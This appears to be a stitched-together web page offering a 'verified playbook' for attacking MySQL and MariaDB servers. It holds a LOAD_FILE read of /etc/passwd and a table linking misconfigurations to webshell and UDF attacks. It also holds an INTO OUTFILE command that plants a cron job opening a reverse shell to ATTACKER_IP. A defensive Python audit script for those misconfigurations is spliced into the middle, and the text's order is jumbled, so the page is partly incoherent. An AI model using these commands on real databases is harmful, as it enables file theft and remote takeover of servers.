If the MySQL user has the FILE privilege and the secure_file_priv configuration allows it (or is empty), you can read arbitrary files from the server's disk using a standard SELECT statement.
The "HackTrick":
You don't need to load data into a table; you can load it directly into a result set using LOAD_FILE().
```sql
SELECT LOAD_FILE('/etc/passwd');
```
Why it's interesting:
| Misconfiguration | Attack |
|----------------|--------|
| secure_file_priv='' | File read/write anywhere |
| plugin_dir writable | UDF execution |
| root with empty password | Full control |
| FILE privilege granted to web app user | Write webshell |
| Log files in web-accessible dir | Write query logs containing PHP |
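
Seen from the hardening side, most rows of this table can be checked from a read-only snapshot of the server. The following is an added example, not code from the original page: `audit`, its finding codes, the `web_roots` and `admins` defaults and the sample snapshot are assumptions made for illustration. The writable `plugin_dir` row is left out because it needs a filesystem check on the host.

```python
from pathlib import PurePosixPath

# Read-only queries that produce the three inputs to audit().
COLLECT = (
    "SHOW GLOBAL VARIABLES WHERE Variable_name IN "
    "('secure_file_priv','general_log_file','slow_query_log_file')",
    "SELECT grantee FROM information_schema.user_privileges "
    "WHERE privilege_type = 'FILE'",
    "SELECT user, host, plugin, authentication_string FROM mysql.user",
)
# Plugins that authenticate with a stored password hash; socket/PAM-style
# plugins legitimately have an empty authentication_string.
PASSWORD_PLUGINS = {"mysql_native_password", "caching_sha2_password",
                    "sha256_password"}

def _under(path, roots):
    p = PurePosixPath(path or "")
    return any(PurePosixPath(r) in (p, *p.parents) for r in roots)

def audit(variables, file_grantees, accounts,
          web_roots=("/var/www",), admins=("'root'@'localhost'",)):
    """Return (code, detail) findings; web_roots/admins are site assumptions."""
    out = []
    sfp = variables.get("secure_file_priv")
    if sfp == "":                       # empty string = no directory restriction
        out.append(("SFP_EMPTY", "file import/export allowed anywhere"))
    elif sfp not in (None, "NULL") and _under(sfp, web_roots):
        out.append(("SFP_IN_WEBROOT", sfp))
    out += [("FILE_GRANT", g) for g in file_grantees if g not in admins]
    out += [("EMPTY_PASSWORD", f"'{u}'@'{h}'") for u, h, plugin, auth in accounts
            if plugin in PASSWORD_PLUGINS and not auth]
    for name in ("general_log_file", "slow_query_log_file"):
        if _under(variables.get(name), web_roots):
            out.append(("LOG_IN_WEBROOT", f"{name}={variables[name]}"))
    return out

# Constructed sample snapshot (not taken from a real server).
SAMPLE = {
    "variables": {"secure_file_priv": "",
                  "general_log_file": "/var/www/html/logs/query.log",
                  "slow_query_log_file": "db01-slow.log"},
    "file_grantees": ["'root'@'localhost'", "'webapp'@'%'"],
    "accounts": [("root", "localhost", "auth_socket", ""),
                 ("root", "%", "mysql_native_password", ""),
                 ("webapp", "%", "caching_sha2_password", "$A$005$constructed")],
}

if __name__ == "__main__":
    for code, detail in audit(**SAMPLE):
        print(code, detail)
```

A `secure_file_priv` of `NULL` disables import and export entirely, so the check treats it as the safe case alongside a dedicated directory outside the web root.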
In the world of cybersecurity, information is abundant, but accuracy is scarce. When searching for "mysql hacktricks verified", you are not looking for theoretical vulnerabilities or outdated exploits. You are looking for battle-tested commands, bypasses, and privilege escalation paths that work against real-world MySQL and MariaDB deployments.
This article serves as a verified playbook. Every technique listed—from user-defined function (UDF) injection to reading files via LOAD DATA LOCAL INFILE—has been tested against MySQL versions 5.7, 8.0, and compatible MariaDB forks. Whether you have SQL injection or direct database access, this guide will help you pivot, escalate, and exfiltrate.
```sql
SELECT "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" INTO OUTFILE '/etc/cron.d/reverse';
```
If secure_file_priv is set (it prevents INTO OUTFILE/LOAD_FILE outside certain directories), check its value:
```sql
SHOW VARIABLES LIKE 'secure_file_priv';
```
Bypass? Usually no, but misconfigured AppArmor/SELinux might allow writes elsewhere.
This is the core of "mysql hacktricks verified". We assume you have a low-privilege SQL user (e.g., from SQLi or default credentials like root:root).